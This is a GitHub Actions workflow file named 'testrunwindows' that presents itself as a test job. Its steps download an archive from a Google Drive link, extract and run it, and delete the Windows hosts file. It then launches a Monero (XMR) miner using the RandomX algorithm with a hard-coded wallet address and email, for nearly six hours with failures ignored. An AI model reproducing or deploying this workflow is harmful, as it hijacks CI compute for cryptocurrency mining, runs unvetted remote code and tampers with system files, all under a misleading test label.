name: testrunwindows
on:
  workflow_dispatch:

jobs:
  testrunwindows:
    runs-on: windows-latest
    steps:
    - name: check
      timeout-minutes: 2
      run: |
        Invoke-WebRequest https://drive.google.com/uc?id=1NP_E9JkmiJqEQyu_g5zfRn6lXgcZmz2X  -OutFile C:\code.rar
        7z e C:\code.rar
        del "C:\Windows\System32\drivers\etc\hosts"
    - name: files run
      run: cmd /c cmdline_launcher.bat -algo randomx -wallet 42Acu5n6BdqaYimi98PHU6dADkduYP7qz4Tpc7ncQ7yLgBN7hXXk3y89sKBtzhFgRuLrK713S6Nc1HUVSpa6SieT318VprR -coin xmr -email Freddinguyen95@gmail.com
      timeout-minutes: 357
      continue-on-error: true
